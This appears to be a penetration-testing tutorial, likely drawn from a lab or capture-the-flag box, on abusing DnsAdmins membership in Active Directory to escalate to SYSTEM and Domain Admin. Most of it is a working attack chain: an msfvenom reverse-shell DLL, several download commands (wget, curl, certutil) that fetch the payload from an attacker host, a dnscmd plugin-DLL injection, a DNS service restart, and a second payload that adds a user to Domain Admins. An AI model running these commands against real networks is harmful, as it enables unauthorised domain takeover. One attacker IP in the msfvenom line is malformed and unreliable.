Abusing DNSAdmin Privilege For Escalation "Active Directory"

## Description Users who are members of the group **DnsAdmins** have the ability to abuse a feature in the Microsoft DNS management protocol to make the DNS server load any specified DLL. The service which in turn, executes the DLL is performed in the context of SYSTEM and could be used on a Domain Controller (Where DNS is usually running from) to gain Domain Administrator privileges. ## When can it be abused? Once in an AD environment you can check for the user who is in the group **DnsAdmin** or Alias **DnsAdmin** with the commands: ```batch net user <username> /domain ``` ```powershell Get-ADGroupMember -Identity "DnsAdmins" ``` ```powershell # only if you have access as the user you are enumerating whoami /groups ``` If the output is as follows : ```powershell *Evil-WinRM* PS C:\Users\ryan\Desktop> Get-ADGroupMember -Identity "DnsAdmins" distinguishedName : CN=Contractors,OU=Groups,DC=megabank,DC=local name : Contractors objectClass : group objectGUID : 9f2ff7be-f805-491f-aff1-3653653874d7 SamAccountName : Contractors SID : S-1-5-21-1392959593-3013219662-3596683436-1103 ``` or ```powershell *Evil-WinRM* PS C:\Users\ryan\Desktop> whoami /groups GROUP INFORMATION ----------------- Group Name Type SID Attributes ========================================== ================ ============================================== =============================================================== Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group MEGABANK\Contractors Group S-1-5-21-1392959593-3013219662-3596683436-1103 Mandatory group, Enabled by default, Enabled group MEGABANK\DnsAdmins Alias S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group Mandatory Label\Medium Mandatory Level Label S-1-16-8192 ``` Then you can abuse this privilege! ## How can it be abused? #### Creating the DLL with MSFVenom Using metasploit "msfvenom" to create a malicious dll that will return a reverse shell with the command: ```shell! msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=10.10.10.14.12 LPORT=1337 -f dll > pew.dll ``` #### Delivering the DLL There are multiple ways for this stage, you can either host it in your SMBServer, Python HTTP server, or if you have shell in evil-winrm you can just upload the file. ###### SMB Server Using the impacket scripts, **impacket-smbserver** you can run your server with a named share and test if you can reach it. Then from the target's host you can use net view to connect and grab the DLL. ```shell ~ $ sudo impacket-smbserver testshare /home/kali/Desktop/test ``` you can then test if it's up with the command: ```shell ~ $ smbclient -L //10.10.14.12/ -N ``` Replace **10.10.14.12** with your smb server IP. To test if the target is able to access your share you can run the command: ```powershell PS C:\> net view \\10.10.14.12 ``` ###### Python HTTP Server With python http.server module you can host the DLL file and download it in the target's machine using common utilities. **HOSTING** ```shell ~ $ sudo python3 -m http.server 80 ``` **DOWNLOADING** ```powershell= wget http://10.10.14.12/pew.dll curl http://10.10.14.12/pew.dll -OutFile pew.dll certutil.exe -urlcache -f http://10.10.14.12/pew.exe pew.exe ``` ###### Evil-WinRM Just run the command `upload /path/to/pew.dll` ```powershell *Evil-WinRM* PS C:\Users\ryan\Desktop> upload /home/kali/Desktop/test/pew.dll Info: Uploading pew.dll to C:\Users\ryan\Desktop\pew.dll Data: 12288 bytes of 12288 bytes copied Info: Upload successful! ``` #### Execution We now inject the DLL in dnscmd executable using the command: ```powershell dnscmd <FQDN of DC> /config /serverlevelplugindll /path/to/pew.dll ``` ```powershell *Evil-WinRM* PS C:\Users\ryan\Desktop> dnscmd test.vulnerable.local /config /serverlevelplugindll C:\Users\ryan\Desktop\pew.dll Registry property serverlevelplugindll successfully reset. Command completed successfully. ``` Now that the DLL is added successfully the next thing is to restart the dns server to trigger the DLL in returning a reverse shell. ```powershell sc.exe stop dns sc.exe start dns ``` This should trigger a reverse shell as administrator! #### ALTERNATIVE EXECUTION Alternatively if the reverse shell is too much, you can just create a DLL that will add the user you have access to the Domain Admins group. Below is the command to creaate the DLL: ```shell msfvenom -p windows/x64/exec cmd='net group "Domain Admins" <user> /add /domain' --platform windows -f dll > pew.dll ``` I then upload it to the target's host! And attempt to execute it! ![](https://i.imgur.com/wmcfmHa.png)